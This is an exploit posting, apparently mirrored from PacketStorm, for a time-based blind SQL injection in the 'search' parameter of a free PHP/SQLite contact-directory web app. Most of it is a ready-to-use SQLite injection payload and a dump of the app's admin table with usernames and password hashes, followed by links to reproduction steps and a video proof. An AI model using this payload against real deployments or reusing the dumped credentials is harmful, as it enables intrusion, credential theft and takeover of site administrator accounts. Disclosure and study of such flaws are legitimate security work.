Share
## https://sploitus.com/exploit?id=PACKETSTORM:164385
https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html  
  
## Vendor:  
[href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html)  
  
## Description:  
The `search` parameter appears to be vulnerable to time-based blind  
SQL injection attacks, on the web app "Local Offices Contact  
Directories Site" (by oretnom23).  
The malicious attacker can execute a malicious payload and he can dump  
hashes authentication credentials. Then the attacker can to  
take control of the admin account of the system and can steal  
sensitive information and can destroy the system administrative  
account.  
  
  
## Payload:  
```sql  
---  
Parameter: search (GET)  
Type: time-based blind  
Title: SQLite > 2.0 AND time-based blind (heavy query)  
Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245  
AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'  
---  
```  
- dump  
  
```sql  
Table: admin_list  
[2 entries]  
+----------+----------------------------------+  
| username | password |  
+----------+----------------------------------+  
| admin | 0192023a7bbd73250516f069df18b500 |  
| cblake | cd74fae0a3adf459f73bbf187607ccea |  
+----------+----------------------------------+  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421)  
  
## Proof:  
[href](https://streamable.com/zmm464)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://www.exploit-db.com/  
https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>